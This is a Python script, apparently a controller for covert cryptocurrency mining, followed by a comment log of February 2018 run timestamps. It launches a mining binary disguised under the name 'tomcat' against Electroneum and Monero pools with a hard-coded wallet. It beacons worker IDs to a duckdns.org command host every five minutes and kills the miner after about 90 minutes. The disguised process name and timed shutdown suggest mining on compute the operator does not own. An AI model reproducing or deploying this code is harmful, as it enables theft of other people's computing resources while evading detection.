import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:13:05.824376
#2018-02-17 17:01:05.568205
#2018-02-17 18:49:04.769384
#2018-02-17 20:38:04.319091
#2018-02-17 22:24:07.651100
#2018-02-18 00:08:01.548145
#2018-02-18 01:59:03.804023
#2018-02-18 03:46:07.325677
#2018-02-18 05:34:06.679330
#2018-02-18 07:27:06.228161
#2018-02-18 09:14:01.746169
#2018-02-18 11:01:03.979408
#2018-02-18 12:47:01.889968
#2018-02-18 14:32:05.477936
#2018-02-18 16:22:04.081106
#2018-02-18 18:11:05.253206
#2018-02-18 19:56:06.068898
#2018-02-18 21:44:05.323707
#2018-02-18 23:33:07.134738
#2018-02-19 01:20:08.192979
#2018-02-19 03:08:07.390978
#2018-02-19 04:53:06.010745
#2018-02-19 06:39:05.657511
#2018-02-19 08:29:04.278091
#2018-02-19 10:18:02.072962
#2018-02-19 12:06:01.826624
#2018-02-19 13:54:02.006643
#2018-02-19 15:42:06.861406
#2018-02-19 17:28:03.986005
#2018-02-19 19:16:05.460763
#2018-02-19 21:05:05.428370
#2018-02-19 22:50:07.581820
#2018-02-20 00:33:04.559988
#2018-02-20 02:22:01.557842
#2018-02-20 04:12:07.025434
#2018-02-20 05:55:08.413743
#2018-02-20 07:41:03.914811
#2018-02-20 09:25:07.421596
#2018-02-20 11:09:05.608002
#2018-02-20 12:55:07.544334
#2018-02-20 14:39:07.335017
#2018-02-20 16:25:11.314954
#2018-02-20 18:11:09.157359
#2018-02-20 20:04:05.542048
#2018-02-20 21:50:06.792041
#2018-02-20 23:32:05.228968
#2018-02-21 01:16:01.561273
#2018-02-21 03:05:01.781995
#2018-02-21 04:52:05.237743
#2018-02-21 06:39:15.327732
#2018-02-21 08:25:06.031689
#2018-02-21 08:26:07.654103
#2018-02-21 10:11:08.113345
#2018-02-21 11:46:06.027675
#2018-02-21 13:19:11.699846
#2018-02-21 14:52:06.544293
#2018-02-21 16:27:01.932245
#2018-02-21 18:04:09.204902
#2018-02-21 19:34:05.224582
#2018-02-21 21:09:05.899365
#2018-02-21 22:43:01.959099
#2018-02-22 00:21:01.929275
#2018-02-22 01:52:05.588754
#2018-02-22 03:27:07.864619
#2018-02-22 04:58:03.695194
#2018-02-22 06:31:01.757080
#2018-02-22 08:07:01.440729
#2018-02-22 09:42:01.927162
#2018-02-22 11:12:07.458960
#2018-02-22 12:44:07.092091
#2018-02-22 14:18:05.150223
#2018-02-22 15:54:01.661063
#2018-02-22 17:27:01.262816
#2018-02-22 19:01:06.840355
#2018-02-22 20:38:08.466617
#2018-02-22 22:07:09.821445
#2018-02-22 23:44:03.551781
#2018-02-23 01:16:04.927780
#2018-02-23 02:50:09.333603
#2018-02-23 04:25:06.944076
#2018-02-23 05:57:07.332396
#2018-02-23 07:29:04.241485
#2018-02-23 09:30:10.473796
#2018-02-23 11:17:07.168137
#2018-02-23 12:35:09.317439
#2018-02-23 14:00:01.488288
#2018-02-23 15:36:06.549930
#2018-02-23 17:09:03.882646
#2018-02-23 18:35:04.373505
#2018-02-23 20:15:08.569549
#2018-02-23 21:48:08.166301
#2018-02-23 23:24:06.470064
#2018-02-24 00:53:06.571785
#2018-02-24 02:43:06.505575
#2018-02-24 04:37:01.708691
#2018-02-24 06:21:07.459875
#2018-02-24 08:09:06.223331
#2018-02-24 09:54:05.753263
#2018-02-24 11:49:01.735358
#2018-02-24 13:40:06.390479
#2018-02-24 15:27:05.242261
#2018-02-24 17:17:02.191264
#2018-02-24 19:08:06.151349
#2018-02-24 20:57:01.824932
#2018-02-24 23:24:07.012543
#2018-02-25 02:49:03.791853
#2018-02-25 06:34:05.333391